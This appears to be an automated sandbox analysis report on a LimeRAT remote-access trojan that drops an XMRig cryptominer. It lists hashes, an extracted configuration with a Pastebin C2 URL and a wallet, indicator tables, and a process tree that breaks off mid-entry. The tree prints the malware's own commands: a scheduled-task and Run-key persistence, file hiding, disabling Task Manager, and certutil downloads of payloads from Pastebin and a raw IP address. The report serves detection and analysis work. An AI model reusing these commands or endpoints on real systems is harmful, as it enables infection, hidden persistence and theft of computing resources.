limerat | 56464850801241284ae026a58bf65cf22d5b7f0800a1058fc84cd6802cf3a7c9

Analysis

max time kernel
63s
max time network
133s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
17-09-2022 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56464850801241284AE026A58BF65CF22D5B7F0800A10.exe
Size

108KB
MD5

018f06156f16a08a4689179458972941
SHA1

7215c5f8a21e715d932908aa4c640333afac5f1c
SHA256

56464850801241284ae026a58bf65cf22d5b7f0800a1058fc84cd6802cf3a7c9
SHA512

88e1b4c09311d58098815fd41e5c08f43b8884b1e5c659110c0cbb052df550abafb0cf24526c903e7fd9ca7c0a2abe19fdaf116c06d92a0ef41a0e8db2955fd5
SSDEEP

3072:4siUbw3GIz12qSfX10gzg8wZ29iFparpaaWruERzxaiEacrMtAs8UqDC4RaVRtmy:Jq3GIz12qSfX10gzg8wZ29iFparpaaWM

Score

10^/10

limerat xmrig evasion miner persistence rat upx

Malware Config

Extracted

Family

limerat

Wallets

38ZggxKrjJSn9XmS8sM1iTQhX3K6ny5u6E

Attributes

aes_key
beodz
antivm
false
c2_url
https://pastebin.com/raw/nEZ87Pwx
delay
3
download_payload
false
install
true
install_name
svchost.exe
main_folder
AppData
pin_spread
true
sub_folder
\MicrosoftData\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/memory/2688-225-0x000000013F480000-0x000000013FC48000-memory.dmp	xmrig
behavioral1/memory/2688-229-0x000000013F480000-0x000000013FC48000-memory.dmp	xmrig
behavioral1/memory/864-232-0x000000013F3E0000-0x000000013FBA8000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
15	1668	WScript.exe
16	780	WScript.exe
57	780	WScript.exe
61	1668	WScript.exe
72	780	WScript.exe
75	1668	WScript.exe
86	828	WScript.exe
87	2160	WScript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
2020	svchost.exe
2056	svchost.exe
2736	tmpF9EB.tmp.exe
2788	windowsapp.exe
1504	irom.com
1708	lirb.com
2296	winlogon.exe

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
432	attrib.exe
2148	attrib.exe
2880	attrib.exe
2916	attrib.exe
960	attrib.exe
864	attrib.exe
1456	attrib.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000139cc-102.dat	upx
behavioral1/files/0x00070000000139cc-103.dat	upx
behavioral1/files/0x00070000000139cc-104.dat	upx
behavioral1/files/0x00070000000139cc-105.dat	upx
behavioral1/files/0x00070000000139cc-107.dat	upx
behavioral1/memory/2788-129-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x00070000000139bc-171.dat	upx
behavioral1/files/0x00070000000135a6-173.dat	upx
behavioral1/files/0x0008000000012703-175.dat	upx
behavioral1/memory/2788-231-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Drops startup file 17 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe

Loads dropped DLL 12 IoCs

pid	Process
2020	svchost.exe
2020	svchost.exe
2056	svchost.exe
2736	tmpF9EB.tmp.exe
2736	tmpF9EB.tmp.exe
2736	tmpF9EB.tmp.exe
2736	tmpF9EB.tmp.exe
1708	lirb.com
1708	lirb.com
1708	lirb.com
1708	lirb.com
1708	lirb.com

Adds Run key to start application 2 TTPs 28 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\t = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\t.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updates = "C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Windows Updates\\winupdate.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Logons = "C:\\Windows (x86)\\explorer.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\t = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\t.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\t = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\t.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\t = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\t.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2056 set thread context of 2652	2056	svchost.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
960	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2988	taskkill.exe
3056	taskkill.exe
2920	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2080	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2748	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
1504	irom.com
1708	lirb.com

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2056	svchost.exe
2652	MSBuild.exe
2056	svchost.exe
2056	svchost.exe
2652	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2056	svchost.exe
Token: SeDebugPrivilege	2056	svchost.exe
Token: SeDebugPrivilege	2652	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemProfilePrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeProfSingleProcessPrivilege	2884	WMIC.exe
Token: SeIncBasePriorityPrivilege	2884	WMIC.exe
Token: SeCreatePagefilePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeDebugPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeRemoteShutdownPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: 33	2884	WMIC.exe
Token: 34	2884	WMIC.exe
Token: 35	2884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemProfilePrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeProfSingleProcessPrivilege	2884	WMIC.exe
Token: SeIncBasePriorityPrivilege	2884	WMIC.exe
Token: SeCreatePagefilePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeDebugPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeRemoteShutdownPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: 33	2884	WMIC.exe
Token: 34	2884	WMIC.exe
Token: 35	2884	WMIC.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2952	WMIC.exe
Token: SeSecurityPrivilege	2952	WMIC.exe
Token: SeTakeOwnershipPrivilege	2952	WMIC.exe
Token: SeLoadDriverPrivilege	2952	WMIC.exe
Token: SeSystemProfilePrivilege	2952	WMIC.exe
Token: SeSystemtimePrivilege	2952	WMIC.exe
Token: SeProfSingleProcessPrivilege	2952	WMIC.exe
Token: SeIncBasePriorityPrivilege	2952	WMIC.exe
Token: SeCreatePagefilePrivilege	2952	WMIC.exe
Token: SeBackupPrivilege	2952	WMIC.exe
Token: SeRestorePrivilege	2952	WMIC.exe
Token: SeShutdownPrivilege	2952	WMIC.exe
Token: SeDebugPrivilege	2952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2952	WMIC.exe
Token: SeRemoteShutdownPrivilege	2952	WMIC.exe
Token: SeUndockPrivilege	2952	WMIC.exe
Token: SeManageVolumePrivilege	2952	WMIC.exe
Token: 33	2952	WMIC.exe
Token: 34	2952	WMIC.exe
Token: 35	2952	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 2020	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	27
PID 1512 wrote to memory of 2020	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	27
PID 1512 wrote to memory of 2020	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	27
PID 1512 wrote to memory of 2020	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	27
PID 1512 wrote to memory of 1988	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	28
PID 1512 wrote to memory of 1988	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	28
PID 1512 wrote to memory of 1988	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	28
PID 1512 wrote to memory of 1716	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	29
PID 1512 wrote to memory of 1716	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	29
PID 1512 wrote to memory of 1716	1512	56464850801241284AE026A58BF65CF22D5B7F0800A10.exe	29
PID 1988 wrote to memory of 780	1988	WScript.exe	31
PID 1988 wrote to memory of 780	1988	WScript.exe	31
PID 1988 wrote to memory of 780	1988	WScript.exe	31
PID 1716 wrote to memory of 1668	1716	WScript.exe	30
PID 1716 wrote to memory of 1668	1716	WScript.exe	30
PID 1716 wrote to memory of 1668	1716	WScript.exe	30
PID 2020 wrote to memory of 960	2020	svchost.exe	35
PID 2020 wrote to memory of 960	2020	svchost.exe	35
PID 2020 wrote to memory of 960	2020	svchost.exe	35
PID 2020 wrote to memory of 960	2020	svchost.exe	35
PID 2020 wrote to memory of 2056	2020	svchost.exe	37
PID 2020 wrote to memory of 2056	2020	svchost.exe	37
PID 2020 wrote to memory of 2056	2020	svchost.exe	37
PID 2020 wrote to memory of 2056	2020	svchost.exe	37
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2652	2056	svchost.exe	40
PID 2056 wrote to memory of 2736	2056	svchost.exe	41
PID 2056 wrote to memory of 2736	2056	svchost.exe	41
PID 2056 wrote to memory of 2736	2056	svchost.exe	41
PID 2056 wrote to memory of 2736	2056	svchost.exe	41
PID 2736 wrote to memory of 2788	2736	tmpF9EB.tmp.exe	42
PID 2736 wrote to memory of 2788	2736	tmpF9EB.tmp.exe	42
PID 2736 wrote to memory of 2788	2736	tmpF9EB.tmp.exe	42
PID 2736 wrote to memory of 2788	2736	tmpF9EB.tmp.exe	42
PID 2788 wrote to memory of 2848	2788	windowsapp.exe	43
PID 2788 wrote to memory of 2848	2788	windowsapp.exe	43
PID 2788 wrote to memory of 2848	2788	windowsapp.exe	43
PID 2788 wrote to memory of 2848	2788	windowsapp.exe	43
PID 2848 wrote to memory of 2884	2848	cmd.exe	45
PID 2848 wrote to memory of 2884	2848	cmd.exe	45
PID 2848 wrote to memory of 2884	2848	cmd.exe	45
PID 2848 wrote to memory of 2920	2848	cmd.exe	46
PID 2848 wrote to memory of 2920	2848	cmd.exe	46
PID 2848 wrote to memory of 2920	2848	cmd.exe	46
PID 2848 wrote to memory of 2952	2848	cmd.exe	47
PID 2848 wrote to memory of 2952	2848	cmd.exe	47
PID 2848 wrote to memory of 2952	2848	cmd.exe	47
PID 2848 wrote to memory of 2988	2848	cmd.exe	48
PID 2848 wrote to memory of 2988	2848	cmd.exe	48
PID 2848 wrote to memory of 2988	2848	cmd.exe	48
PID 2848 wrote to memory of 3020	2848	cmd.exe	49
PID 2848 wrote to memory of 3020	2848	cmd.exe	49
PID 2848 wrote to memory of 3020	2848	cmd.exe	49
PID 2848 wrote to memory of 3056	2848	cmd.exe	50
PID 2848 wrote to memory of 3056	2848	cmd.exe	50
PID 2848 wrote to memory of 3056	2848	cmd.exe	50
PID 2848 wrote to memory of 2080	2848	cmd.exe	51

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
960	attrib.exe
2768	attrib.exe
2952	attrib.exe
1752	attrib.exe
1324	attrib.exe
1456	attrib.exe
2148	attrib.exe
2880	attrib.exe
864	attrib.exe
2800	attrib.exe
2816	attrib.exe
1008	attrib.exe
432	attrib.exe
2916	attrib.exe
1812	attrib.exe

C:\Users\Admin\AppData\Local\Temp\56464850801241284AE026A58BF65CF22D5B7F0800A10.exe
"C:\Users\Admin\AppData\Local\Temp\56464850801241284AE026A58BF65CF22D5B7F0800A10.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:960
- - C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe
    "C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" "C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2652
  - - C:\Users\Admin\AppData\Local\Temp\tmpF9EB.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpF9EB.tmp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2736
    - - C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2788
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5AC.tmp\5BD.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2848
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM taskmgr.exe /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2920
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Taskmgr.exe' delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Taskmgr.exe /F
        7⤵
        Kills process with taskkill
        
        PID:2988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='xmrig.exe' delete
        7⤵
        
        PID:3020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM xmrig.exe /F
        7⤵
        Kills process with taskkill
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2080
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:1752
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        7⤵
        Views/modifies file attributes
        
        PID:1324
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        7⤵
        
        PID:2024
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        7⤵
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
        7⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1504
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:828
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1708
        
        C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
        
        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
        8⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:960
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:864
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1456
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:432
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2148
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        7⤵
        
        PID:272
        
        C:\Windows\system32\find.exe
        
        find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        7⤵
        
        PID:2476
        
        C:\Windows\system32\cmd.exe
        
        cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
        7⤵
        
        PID:2616
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Microsoft.exe' delete
        7⤵
        
        PID:2632
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='winupdate.exe' delete
        7⤵
        
        PID:2676
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
        7⤵
        Adds Run key to start application
        
        PID:2748
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
        7⤵
        Adds Run key to start application
        
        PID:2760
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        7⤵
        Views/modifies file attributes
        
        PID:2768
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:2800
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
        7⤵
        Drops startup file
        Views/modifies file attributes
        
        PID:2816
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
        7⤵
        
        PID:2780
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
        7⤵
        Drops startup file
        
        PID:2836
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2880
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2916
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        7⤵
        
        PID:2900
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        7⤵
        
        PID:2924
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:2952
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        7⤵
        
        PID:3012
        
        C:\Windows\system32\certutil.exe
